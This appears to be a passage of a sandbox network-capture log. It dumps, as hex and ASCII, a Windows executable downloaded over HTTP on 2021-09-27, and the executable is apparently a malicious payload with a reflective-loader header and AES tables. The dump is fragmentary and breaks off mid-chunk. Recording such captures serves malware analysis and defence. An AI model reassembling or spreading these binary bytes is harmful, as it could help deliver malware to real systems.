2021-09-27 18:36:57 UTC	1	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 58 65 59 4f 78 58 56 36 55 72 68 76 32 61 70 63 68 7a 25 32 46 68 47 79 32 6d 36 50 25 32 46 39 54 49 42 4a 6a 7a 30 43 4d 75 41 46 6b 52 36 79 6b 30 48 6f 4e 62 76 68 39 55 76 71 35 61 55 54 42 44 50 74 58 78 5a 47 6e 33 6f 62 39 30 35 48 61 5a 5a 25 32 42 34 41 55 4b 63 46 61 43 55 4c 25 32 46 45 49 43 25 32 46 79 57 6d 76 53 42 53 4d 49 77 4e 79 63 78 38 4e 41 4c 76 65 52 50 55 50 48 32 6a 70 63 44 74 41 72 4a 63 51 73 25 32 46 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XeYOxXV6Urhv2apchz%2FhGy2m6P%2F9TIBJjz0CMuAFkR6yk0HoNbvh9Uvq5aUTBDPtXxZGn3ob905HaZZ%2B4AUKcFaCUL%2FEIC%2FyWmvSBSMIwNycx8NALveRPUPH2jpcDtArJcQs%2FQ%3D%3D"}],"group":"cf-nel","max
2021-09-27 18:36:57 UTC	1	IN	Data Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 8b c8 83 c0 3c 8b 00 03 c1 83 c0 28 03 08 ff e1 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d 66 3f 1b 39 07 51 48 39 07 51 48 39 07 51 48 22 9a fa 48 75 07 51 48 22 9a cf 48 3a 07 51 48 22 9a cc 48 38 07 51 48 52 69 63 68 39 07 51 48 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 8f 6a a4 3b 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 7c 02 00 00 00 00 00 00 00 00 00 60 d4 01 00 00 10 00 00 00 90 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 Data Ascii: MZERX<(!L!This program cannot be run in DOS mode.$}f?9QH9QH9QH"HuQH"H:QH"H8QHRich9QHPELj;\|`@
2021-09-27 18:36:57 UTC	2	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-09-27 18:36:57 UTC	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-09-27 18:36:57 UTC	5	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 8b 45 10 85 c0 74 17 56 8b 75 08 50 8b 45 0c 50 56 e8 47 91 01 00 83 c4 0c 8b c6 5e 5d c3 8b 45 08 5d c3 51 bd 92 b3 a4 46 aa 93 cf a4 0f b6 48 0c 0f b6 50 0d c1 e1 08 0b ca 0f b6 50 0e 81 e1 ff ff 00 00 81 e2 ff ff ff 00 c1 e1 08 0b ca 0f b6 50 0f d1 ea c1 e1 07 0b ca 8a 50 0b f6 c2 01 74 06 81 c9 00 00 00 80 53 8b d9 c1 eb 18 88 58 0c 8b d9 88 48 0f c1 eb 10 88 58 0d 8b d9 0f b6 48 08 c1 e1 08 56 0f b6 70 09 0b ce 0f b6 70 0a 81 e1 ff ff 00 00 c1 e1 08 81 e6 ff ff ff 00 0f b6 d2 0b ce d1 ea c1 e1 07 Data Ascii: UEtVuPEPVG^]E]QFHPPPPtSXHXHVpp
2021-09-27 18:36:57 UTC	6	IN	Data Raw: 45 14 50 8b 45 08 51 8b 4d 10 c1 ea 08 88 55 fe 8b 55 0c 51 52 50 8d 55 f0 e8 dc fd ff ff 83 c4 14 8b e5 5d c3 36 c7 7c 56 4d 55 8b ec 83 ec 10 53 57 8b f8 33 c0 89 07 89 47 04 89 47 08 89 47 0c 8b 45 08 50 51 56 8b da e8 bc fc ff ff 8b 55 0c 53 52 56 e8 b1 fc ff ff 8b 4d 08 8d 04 cd 00 00 00 00 8b d0 c1 ea 18 88 55 f4 8b d0 02 c9 c1 e8 08 02 c9 c1 ea 10 88 45 f6 8d 04 dd 00 00 00 00 02 c9 88 55 f5 88 4d f7 8b c8 8b d0 c1 e8 08 88 45 fe 02 db 6a 10 8d 45 f0 02 db 50 c1 e9 18 c1 ea 10 02 db 56 c7 45 f0 00 00 00 00 c7 45 f8 00 00 00 00 88 4d fc 88 55 fd 88 5d ff e8 48 fc ff ff 83 c4 24 5f 5b 8b e5 5d c3 84 77 07 8c 12 32 e8 f5 f4 72 b8 19 0c e0 88 55 8b ec 8b 45 10 8b 4d 0c 83 ec 40 53 8b 5d 08 57 50 51 53 e8 d7 1f 00 00 8b f8 83 c4 0c 85 ff 0f 84 84 00 00 Data Ascii: EPEQMUUQRPU]6\|VMUSW3GGGEPQVUSRVMUEUMEjEPVEEMU]H$_[]w2rUEM@S]WPQS
2021-09-27 18:36:57 UTC	8	IN	Data Raw: 58 b0 c7 85 6c fc ff ff 4a cf cf 85 c7 85 70 fc ff ff 6b d0 d0 bb c7 85 74 fc ff ff 2a ef ef c5 c7 85 78 fc ff ff e5 aa aa 4f c7 85 7c fc ff ff 16 fb fb ed c7 85 80 fc ff ff c5 43 43 86 c7 85 84 fc ff ff d7 4d 4d 9a c7 85 88 fc ff ff 55 33 33 66 c7 85 8c fc ff ff 94 85 85 11 c7 85 90 fc ff ff cf 45 45 8a c7 85 94 fc ff ff 10 f9 f9 e9 c7 85 98 fc ff ff 06 02 02 04 c7 85 9c fc ff ff 81 7f 7f fe c7 85 a0 fc ff ff f0 50 50 a0 c7 85 a4 fc ff ff 44 3c 3c 78 c7 85 a8 fc ff ff ba 9f 9f 25 c7 85 ac fc ff ff e3 a8 a8 4b c7 85 b0 fc ff ff f3 51 51 a2 c7 85 b4 fc ff ff fe a3 a3 5d c7 85 b8 fc ff ff c0 40 40 80 c7 85 bc fc ff ff 8a 8f 8f 05 c7 85 c0 fc ff ff ad 92 92 3f c7 85 c4 fc ff ff bc 9d 9d 21 c7 85 c8 fc ff ff 48 38 38 70 c7 85 cc fc ff ff 04 f5 f5 f1 c7 85 d0 Data Ascii: XlJpkt*xO\|CCMMU33fEEPPD<<x%KQQ]@@?!H88p
2021-09-27 18:36:57 UTC	9	IN	Data Raw: 94 94 33 c7 85 90 fe ff ff b6 9b 9b 2d c7 85 94 fe ff ff 22 1e 1e 3c c7 85 98 fe ff ff 92 87 87 15 c7 85 9c fe ff ff 20 e9 e9 c9 c7 85 a0 fe ff ff 49 ce ce 87 c7 85 a4 fe ff ff ff 55 55 aa c7 85 a8 fe ff ff 78 28 28 50 c7 85 ac fe ff ff 7a df df a5 c7 85 b0 fe ff ff 8f 8c 8c 03 c7 85 b4 fe ff ff f8 a1 a1 59 c7 85 b8 fe ff ff 80 89 89 09 c7 85 bc fe ff ff 17 0d 0d 1a c7 85 c0 fe ff ff da bf bf 65 c7 85 c4 fe ff ff 31 e6 e6 d7 c7 85 c8 fe ff ff c6 42 42 84 c7 85 cc fe ff ff b8 68 68 d0 c7 85 d0 fe ff ff c3 41 41 82 c7 85 d4 fe ff ff b0 99 99 29 c7 85 d8 fe ff ff 77 2d 2d 5a c7 85 dc fe ff ff 11 0f 0f 1e c7 85 e0 fe ff ff cb b0 b0 7b c7 85 e4 fe ff ff fc 54 54 a8 c7 85 e8 fe ff ff d6 bb bb 6d c7 85 ec fe ff ff 3a 16 16 2c c7 85 f0 f6 ff ff 50 a7 f4 51 c7 85 Data Ascii: 3-"< IUUx((PzYe1BBhhAA)w--Z{TTm:,PQ
2021-09-27 18:36:57 UTC	10	IN	Data Raw: b1 67 0a 0c c7 85 b4 f8 ff ff 0f e7 57 93 c7 85 b8 f8 ff ff d2 96 ee b4 c7 85 bc f8 ff ff 9e 91 9b 1b c7 85 c0 f8 ff ff 4f c5 c0 80 c7 85 c4 f8 ff ff a2 20 dc 61 c7 85 c8 f8 ff ff 69 4b 77 5a c7 85 cc f8 ff ff 16 1a 12 1c c7 85 d0 f8 ff ff 0a ba 93 e2 c7 85 d4 f8 ff ff e5 2a a0 c0 c7 85 d8 f8 ff ff 43 e0 22 3c c7 85 dc f8 ff ff 1d 17 1b 12 c7 85 e0 f8 ff ff 0b 0d 09 0e c7 85 e4 f8 ff ff ad c7 8b f2 c7 85 e8 f8 ff ff b9 a8 b6 2d c7 85 ec f8 ff ff c8 a9 1e 14 c7 85 f0 f8 ff ff 85 19 f1 57 c7 85 f4 f8 ff ff 4c 07 75 af c7 85 f8 f8 ff ff bb dd 99 ee c7 85 fc f8 ff ff fd 60 7f a3 c7 85 00 f9 ff ff 9f 26 01 f7 c7 85 04 f9 ff ff bc f5 72 5c c7 85 08 f9 ff ff c5 3b 66 44 c7 85 0c f9 ff ff 34 7e fb 5b c7 85 10 f9 ff ff 76 29 43 8b c7 85 14 f9 ff ff dc c6 23 cb c7 Data Ascii: gWO aiKwZ*C"<-WLu`&r\;fD4~[v)C#
2021-09-27 18:36:57 UTC	12	IN	Data Raw: ff de b3 0c 08 c7 85 d8 fa ff ff 9c e4 b4 d8 c7 85 dc fa ff ff 90 c1 56 64 c7 85 e0 fa ff ff 61 84 cb 7b c7 85 e4 fa ff ff 70 b6 32 d5 c7 85 e8 fa ff ff 74 5c 6c 48 c7 85 ec fa ff ff 42 57 b8 d0 c7 85 00 ff ff ff 52 09 6a d5 c7 85 04 ff ff ff 30 36 a5 38 c7 85 08 ff ff ff bf 40 a3 9e c7 85 0c ff ff ff 81 f3 d7 fb c7 85 10 ff ff ff 7c e3 39 82 c7 85 14 ff ff ff 9b 2f ff 87 c7 85 18 ff ff ff 34 8e 43 44 c7 85 1c ff ff ff c4 de e9 cb c7 85 20 ff ff ff 54 7b 94 32 c7 85 24 ff ff ff a6 c2 23 3d c7 85 28 ff ff ff ee 4c 95 0b c7 85 2c ff ff ff 42 fa c3 4e c7 85 30 ff ff ff 08 2e a1 66 c7 85 34 ff ff ff 28 d9 24 b2 c7 85 38 ff ff ff 76 5b a2 49 c7 85 3c ff ff ff 6d 8b d1 25 c7 85 40 ff ff ff 72 f8 f6 64 c7 85 44 ff ff ff 86 68 98 16 c7 85 48 ff ff ff d4 a4 5c cc Data Ascii: Vda{p2t\lHBWRj068@\|9/4CD T{2$#=(L,BN0.f4($8v[I<m%@rdDhH\
2021-09-27 18:36:57 UTC	13	IN	Data Raw: e7 00 ff 00 ff c1 c2 08 81 e2 ff 00 ff 00 0b fa 8b 56 04 33 39 8b da c1 cb 08 81 e3 00 ff 00 ff c1 c2 08 81 e2 ff 00 ff 00 0b da 8b 56 08 33 59 04 89 7d f0 89 5d fc 8b da c1 cb 08 81 e3 00 ff 00 ff c1 c2 08 81 e2 ff 00 ff 00 0b da 8b 56 0c 33 59 08 8b f2 c1 ce 08 81 e6 00 ff 00 ff c1 c2 08 81 e2 ff 00 ff 00 0b f2 33 71 0c 8b d3 89 75 f8 8b 75 fc c1 fe 10 81 e6 ff 00 00 00 8b 74 b0 04 c1 fa 08 81 e2 ff 00 00 00 8b 54 90 04 c1 ca 10 c1 ce 08 33 d6 8b 75 f8 81 e6 ff 00 00 00 8b 74 b0 04 c1 c6 08 33 d6 89 5d ec 8b f7 c1 fe 18 81 e6 ff 00 00 00 33 54 b0 04 8b 75 f8 33 51 10 c1 fb 10 c1 fe 08 81 e3 ff 00 00 00 8b 5c 98 04 81 e6 ff 00 00 00 8b 74 b0 04 c1 ce 10 c1 cb 08 33 f3 8b df 81 e3 ff 00 00 00 8b 5c 98 04 c1 c3 08 33 f3 8b 5d fc c1 fb 18 81 e3 ff 00 00 00 Data Ascii: V39V3Y}]V3Y3quutT3ut3]3Tu3Q\t3\3]
2021-09-27 18:36:57 UTC	14	IN	Data Raw: 00 ff 00 00 33 fb 8b de 81 e3 ff 00 00 00 0f b6 5c 98 05 33 fb 33 79 08 c1 fa 10 8b df c1 cb 08 81 e3 00 ff 00 ff c1 c7 08 81 e7 ff 00 ff 00 0b df 8b fb 8b 5d 0c 89 7b 08 8b 7d f8 c1 ff 18 81 e7 ff 00 00 00 8b 7c b8 04 81 e2 ff 00 00 00 8b 54 90 04 81 e7 00 00 ff ff c1 e7 08 81 e2 00 00 ff 00 33 fa c1 fe 08 81 e6 ff 00 00 00 8b 54 b0 04 81 e2 00 ff 00 00 33 fa 8b 55 f4 81 e2 ff 00 00 00 0f b6 44 90 05 33 f8 33 79 0c 8b cf c1 c9 08 81 e1 00 ff 00 ff c1 c7 08 81 e7 ff 00 ff 00 0b cf 5f 5e 89 4b 0c 5b 8b e5 5d c3 64 b3 73 df 83 0d 81 9f 55 8b ec 8b 45 08 56 8d b0 24 09 00 00 85 f6 75 05 33 c0 5e 5d c3 8b 4d 10 8d 14 cd 00 00 00 00 8b 4d 0c 52 51 56 50 e8 94 f7 ff ff 83 c4 10 85 c0 78 de 89 86 f0 00 00 00 8b c6 5e 5d c3 cc cc 55 8b ec 8b 45 14 8b 4d 0c 8b 91 Data Ascii: 3\33y]{}\|T3T3UD33y_^K[]dsUEV$u3^]MMRQVPx^]UEM
2021-09-27 18:36:57 UTC	16	IN	Data Raw: 5b 8b e5 5d c3 83 f9 37 75 1a 8b 45 08 6a 12 50 e8 46 0a 00 00 83 c4 08 5f 5e b8 04 00 00 00 5b 8b e5 5d c3 83 f9 38 75 1a 8b 4d 08 6a 18 51 e8 27 0a 00 00 83 c4 08 5f 5e b8 04 00 00 00 5b 8b e5 5d c3 83 f9 36 75 18 8b 55 08 52 e8 4a 0d 00 00 83 c4 04 5f 5e b8 04 00 00 00 5b 8b e5 5d c3 83 f9 31 74 0f 83 f9 32 74 0a 83 f9 34 74 05 83 f9 39 75 1a 8d 56 fe 33 c0 85 d2 74 11 81 3c 38 58 4c 4e 47 75 03 89 45 fc 40 3b c2 72 ef 83 f9 34 75 18 8b 45 fc 8b 4d 08 50 57 51 e8 fa 08 00 00 83 c4 0c 5f 5e 5b 8b e5 5d c3 8b 75 fc 85 f6 75 0f 83 f9 39 74 0a 5f 8d 46 04 5e 5b 8b e5 5d c3 83 f9 31 75 15 8b 55 08 56 57 52 e8 da 13 00 00 83 c4 0c 5f 5e 5b 8b e5 5d c3 83 f9 32 75 2a 8d 45 e4 57 50 e8 b1 62 01 00 83 c4 08 85 c0 0f 84 f8 fc ff ff 8b 4d 08 56 57 51 e8 ab 0e 00 Data Ascii: []7uEjPF_^[]8uMjQ'_^[]6uURJ_^[]1t2t4t9uV3t<8XLNGuE@;r4uEMPWQ_^[]uu9t_F^[]1uUVWR_^[]2u*EWPbMVWQ
2021-09-27 18:36:57 UTC	17	IN	Data Raw: e8 cd 5e 00 00 83 c4 28 6a 01 8d 85 70 f5 ff ff 6a 0f 50 e8 ea 63 01 00 83 c4 04 8d 8c 45 70 f5 ff ff 51 56 e8 a9 5e 00 00 8d 55 b4 52 e8 d0 63 01 00 83 c4 14 03 c0 50 8d 45 b4 50 8d 8d 70 f5 ff ff 51 e8 ba 63 01 00 8d 94 45 52 f5 ff ff 83 c4 04 52 e8 ba 60 01 00 8d 8d f8 fe ff ff 8b d1 b8 40 00 00 00 52 66 89 45 9e 89 4d a0 e8 90 63 01 00 03 c0 66 89 45 9c 68 19 02 02 00 8d 85 70 f5 ff ff 50 8d 4d 98 51 56 e8 b4 73 00 00 83 c4 20 85 c0 74 68 8d 55 ec 52 8b 55 98 68 00 01 00 00 8d 85 70 fb ff ff 50 6a 01 8d 4d 9c 51 52 56 e8 2d 43 01 00 83 c4 1c 85 c0 75 41 8b 85 78 fb ff ff 8d 8c 05 70 fb ff ff 51 53 e8 12 63 01 00 8d 94 38 a4 84 00 00 83 c4 04 52 e8 d2 66 01 00 8b 85 78 fb ff ff 8d 8c 05 70 fb ff ff 51 8d 95 78 fd ff ff 52 e8 b8 66 01 00 83 c4 10 8d 85 Data Ascii: ^(jpjPcEpQV^URcPEPpQcERR`@RfEMcfEhpPMQVs thURUhpPjMQRV-CuAxpQSc8RfxpQxRf
2021-09-27 18:36:57 UTC	18	IN	Data Raw: 0c 83 c4 08 68 01 00 04 80 50 ff d6 5f 33 c0 5e 8b e5 5d c3 20 6e 25 09 70 55 8b ec 81 ec 60 04 00 00 53 57 8b 7d 0c 33 db 3b fb 0f 84 b8 00 00 00 66 39 1f 0f 84 af 00 00 00 56 6a 3f 8d 45 a1 53 50 88 5d a0 e8 ef 5b 01 00 8d 4d a0 6a 07 51 e8 c4 67 01 00 8b 75 08 8d 55 a0 52 83 c6 1c 56 e8 c4 55 00 00 68 6f 42 e9 df 53 53 50 56 e8 c6 f8 00 00 8b f0 83 c4 30 3b f3 74 6c 68 fe 03 00 00 8d 8d a2 fb ff ff 33 c0 53 51 66 89 85 a0 fb ff ff e8 a2 5b 01 00 57 e8 0c 5e 01 00 03 c0 83 c4 10 3d fc 03 00 00 77 3f 50 8d 95 a0 fb ff ff 57 52 e8 02 5b 01 00 83 c4 0c 8d 55 e0 8d 85 a0 fb ff ff b9 14 04 00 00 52 89 5d e0 c7 45 e4 03 00 00 00 89 45 e8 89 5d ec 66 89 4d f0 89 5d f2 89 5d f6 89 5d fa ff d6 5e 5f 5b 8b e5 5d c3 75 68 7c a8 60 32 b9 5b 3f e7 55 8b ec 83 ec 28 Data Ascii: hP_3^] n%pU`SW}3;f9Vj?ESP][MjQguURVUhoBSSPV0;tlh3SQf[W^=w?PWR[UR]EE]fM]]]^_[]uh\|`2[?U(
2021-09-27 18:36:57 UTC	20	IN	Data Raw: c7 80 a8 a9 00 00 01 00 00 00 c7 80 14 20 00 00 02 00 00 00 6a 04 8d 85 98 fe ff ff 50 56 e8 fd 53 00 00 6a 00 8d 4d fc 51 8d 95 98 fe ff ff 52 e8 8b 5a 01 00 6a 08 6a 05 e8 f2 47 00 00 0f b6 c0 83 c4 30 50 8d 8d 98 fe ff ff 51 e8 ff 58 01 00 8d 94 45 98 fe ff ff 83 c4 04 52 e8 af 65 01 00 6a 00 8d 45 f0 50 8d 8d 98 fe ff ff 51 e8 4d 5a 01 00 6a 00 6a 01 8d be 2c 0a 00 00 57 56 e8 5c ef 00 00 6a 00 6a 15 57 56 8b d8 e8 4f ef 00 00 56 8b f8 e8 a7 f8 ff ff 83 c4 38 85 c0 75 1a 85 db 74 0a 53 56 e8 95 55 01 00 83 c4 08 5f 5e b8 04 00 00 00 5b 8b e5 5d c3 8b 55 0c 8b 45 10 6a 00 6a 1b 8d 8d 98 fe ff ff 51 56 89 96 2c 0b 00 00 89 86 30 0b 00 00 e8 03 ef 00 00 83 c4 10 85 c0 74 4b 6a 40 8d 55 9c 6a 00 52 e8 ef 55 01 00 33 c0 50 8d 4d e0 51 8d 55 98 52 50 50 68 Data Ascii: jPVSjMQRZjjG0PQXERejEPQMZjj,WV\jjWVOV8utSVU_^[]UEjjQV,0tKj@UjRU3PMQURPPh
2021-09-27 18:36:57 UTC	21	IN	Data Raw: c4 3c 80 38 31 75 68 c6 00 00 b9 01 00 00 00 80 38 2e 74 47 41 48 83 f9 0e 72 f4 56 6a 08 8d 45 bc 50 8d 8d 7c ff ff ff 51 e8 e9 53 01 00 83 c4 0c 89 45 fc 85 c0 74 78 b8 01 00 00 00 8d 74 1f ff 8d 9b 00 00 00 00 8a 0e 84 c9 74 41 80 f9 3a 74 3c 40 4e 83 f8 40 72 ee eb 55 2b f9 8d 04 1f 50 8d 4d bc 51 e8 8d 57 01 00 83 c4 08 eb ac 8d 95 70 ff ff ff 53 52 e8 bb 4d 01 00 83 c4 08 85 c0 75 98 5f b8 04 00 00 00 5b 8b e5 5d c3 8d 48 ff 8b f7 2b f9 51 03 fb 8d 95 b0 fd ff ff 2b f0 57 52 c6 04 1e 00 e8 5c 50 01 00 83 c4 0c 8b fe 8b 75 08 6a 00 6a 04 8d 85 30 fe ff ff 50 56 e8 03 4e 00 00 8d 8d 30 fe ff ff 51 e8 27 53 01 00 6a 00 8d 55 0c 52 8d 85 30 fe ff ff 50 e8 85 54 01 00 6a 08 6a 05 e8 ec 41 00 00 0f b6 c8 83 c4 28 51 8d 95 30 fe ff ff 52 e8 f9 52 01 00 8d Data Ascii: <81uh8.tGAHrVjEP\|QSEtxttA:t<@N@rU+PMQWpSRMu_[]H+Q+WR\Pujj0PVN0Q'SjUR0PTjjA(Q0RR
2021-09-27 18:36:57 UTC	22	IN	Data Raw: 51 56 e8 07 f0 ff ff 56 e8 c1 f1 ff ff 83 c4 24 33 c0 5e 8b e5 5d c3 82 36 d1 8c aa 8f 94 55 8b ec 57 8b 7d 08 8b 87 d8 07 00 00 85 c0 74 76 56 8d b0 00 20 00 00 8b 87 6c 0b 00 00 8d 48 01 89 8f 6c 0b 00 00 83 f8 10 76 2d 83 7e 50 00 74 27 56 57 e8 d7 07 00 00 83 c4 08 83 be a8 89 00 00 00 74 14 56 57 c7 86 a8 89 00 00 00 00 00 00 e8 da 02 00 00 83 c4 08 83 3e 00 74 28 83 7e 04 00 74 22 83 7e 10 00 75 1c 57 c7 46 04 00 00 00 00 e8 a9 16 00 00 57 e8 f3 6c 00 00 57 e8 dd ec ff ff 83 c4 0c 5e 5f 5d c3 17 c9 2e fe 43 49 55 8b ec 53 56 8b 75 08 8b 86 a0 0b 00 00 68 e1 ea 88 06 33 db 53 53 50 8d 8e 94 0c 00 00 51 e8 5c e8 00 00 83 c4 14 89 45 08 3b c3 74 7d 8b ff 68 88 13 00 00 ff 55 08 8b 86 d8 07 00 00 3b c3 74 ee 8d b8 00 20 00 00 8b 86 6c 0b 00 00 8d 50 01 Data Ascii: QVV$3^]6UW}tvV lHlv-~Pt'VWtVW>t(~t"~uWFWlW^_].CIUSVuh3SSPQ\E;t}hU;t lP
2021-09-27 18:36:57 UTC	24	IN	Data Raw: fd ff ff 51 66 89 85 ec fd ff ff e8 c5 46 01 00 8d 9f ac 89 00 00 53 e8 29 49 01 00 03 c0 50 8d 95 ec fd ff ff 53 52 e8 29 46 01 00 8d 85 ec fd ff ff 50 e8 0d 49 01 00 b9 5c 00 00 00 8d 9f ec 8c 00 00 53 66 89 8c 45 ec fd ff ff e8 f4 48 01 00 83 c4 24 03 c0 50 8d 95 ec fd ff ff 53 52 e8 e1 48 01 00 8d 84 45 ec fd ff ff 83 c4 04 50 e8 e1 45 01 00 8d 8d ec fd ff ff 51 e8 c5 48 01 00 83 c4 10 6a 00 8d 95 ec fd ff ff 89 45 f4 8b 86 04 0d 00 00 52 ff d0 8d 8d ec fd ff ff 51 e8 a2 48 01 00 ba 5c 00 00 00 8d 9f ac 8a 00 00 53 66 89 94 45 ec fd ff ff e8 89 48 01 00 83 c4 08 03 c0 50 8d 85 ec fd ff ff 53 50 e8 76 48 01 00 8d 8c 45 ec fd ff ff 83 c4 04 51 e8 76 45 01 00 6a 00 6a 1a 8d 95 ec fd ff ff 52 56 e8 e5 de 00 00 83 c4 1c 85 c0 0f 84 ba 01 00 00 8b 4d f4 33 Data Ascii: QfFS)IPSR)FPI\SfEH$PSRHEPEQHjERQH\SfEHPSPvHEQvEjjRVM3
2021-09-27 18:36:57 UTC	25	IN	Data Raw: 53 8d 4d bc 51 8d 95 60 ff ff ff 52 53 53 53 53 53 53 53 8d 8d 60 fd ff ff 51 53 ff d0 5e 5b 8b e5 5d c3 5e 33 c0 5b 8b e5 5d c3 cc 55 8b ec 8b 4d 08 8b 51 14 85 d2 74 1f 8b 41 18 83 f8 10 72 17 3d 00 14 00 00 73 10 6a 00 50 8b 41 04 52 50 e8 37 f7 00 00 83 c4 10 5d c3 cc cc 55 8b ec 8b 45 08 8b 48 18 53 56 8b 70 04 8b 5e 40 57 8b 78 1c 8b d1 85 db 74 0e 83 be 64 15 00 00 00 75 0e 8b 50 14 8b f9 83 be 64 15 00 00 00 74 0a 85 db 75 06 8b 50 1c 8b 78 20 85 d2 74 17 8d 47 f0 3d ef 13 00 00 77 0d 6a 00 57 52 56 e8 dc f6 00 00 83 c4 10 5f 5e 5b 5d c3 f5 c2 34 41 55 8b ec 57 8b 7d 08 8b 47 04 83 b8 ac 0c 00 00 05 75 0c 50 e8 f7 e1 ff ff 83 c4 04 5f 5d c3 83 b8 68 15 00 00 00 74 0c 57 e8 f2 08 01 00 83 c4 04 5f 5d c3 56 33 f6 39 77 1c 76 44 8d 64 24 00 8b 47 18 Data Ascii: SMQ`RSSSSSSS`QS^[]^3[]UMQtAr=sjPARP7]UEHSVp^@WxtduPdtuPx tG=wjWRV_^[]4AUW}GuP_]htW_]V39wvDd$G
2021-09-27 18:36:57 UTC	26	IN	Data Raw: 53 e8 5d d8 00 00 83 c4 08 50 e8 b4 d8 00 00 83 c4 08 85 c0 74 16 8b 75 0c 6a 14 c7 46 18 05 00 00 00 e8 d0 67 01 00 e9 19 ff ff ff 57 bf 06 00 00 00 be 7d 00 00 00 8d 85 f8 fe ff ff 50 56 53 e8 1e d8 00 00 83 c4 08 50 e8 75 d8 00 00 83 c4 08 85 c0 0f 85 88 00 00 00 46 47 81 fe a4 00 00 00 76 d4 be a5 00 00 00 8d 8d f8 fe ff ff 51 56 53 e8 ed d7 00 00 83 c4 08 50 e8 44 d8 00 00 83 c4 08 85 c0 75 63 46 81 fe a8 00 00 00 76 d9 8b 55 fc 8b 75 0c 83 c2 fc 52 8d 85 f8 fe ff ff 50 8d 8e d8 08 00 00 51 c7 46 18 5c 00 00 00 c7 86 d4 08 00 00 01 00 00 00 e8 e6 3a 01 00 83 c4 0c 6a 14 e8 dd 67 01 00 83 c0 02 50 81 c6 a6 04 00 00 56 e8 9c e6 00 00 83 c4 0c 5f 5e 5b 8b e5 5d c3 8b 75 0c 89 7e 18 eb d7 8b 75 0c c7 46 18 0c 00 00 00 eb cb cc cc cc cc cc cc cc cc cc cc Data Ascii: S]PtujFgW}PVSPuFGvQVSPDucFvUuRPQF\:jgPV_^[]u~uF
2021-09-27 18:36:57 UTC	28	IN	Data Raw: 52 fe f9 04 42 a9 83 7c 27 a3 df 5c 44 87 08 51 03 b8 be 2a 23 26 3f 83 b8 98 48 d8 ae 16 b9 38 b6 42 e8 97 57 1f 95 76 19 4a 9e 5f fb aa fd c5 75 05 c5 90 90 90 90 5b 5f b8 01 00 00 00 5e 8b e5 5d c3 5b 5f 33 c0 5e 8b e5 5d c3 ed 38 07 3c a5 7f 20 65 0a ee 39 25 eb 25 55 8b ec 8b 45 0c 83 ec 3c 50 e8 d1 38 01 00 83 c4 04 3d 00 10 00 00 0f 87 58 01 00 00 56 8b 75 08 8b 8e d8 07 00 00 85 c9 0f 84 45 01 00 00 53 57 8d 3c 00 8d 99 6c f5 1f 00 8b 4d 0c 57 53 51 e8 bb 38 01 00 83 c4 0c 85 c0 0f 85 22 01 00 00 8b 55 0c 57 52 53 e8 95 35 01 00 83 c4 0c 33 c9 33 c0 68 04 01 00 00 66 89 4d fc 8b 8e c0 0c 00 00 8d 9e 68 44 00 00 53 c7 45 f4 0d 00 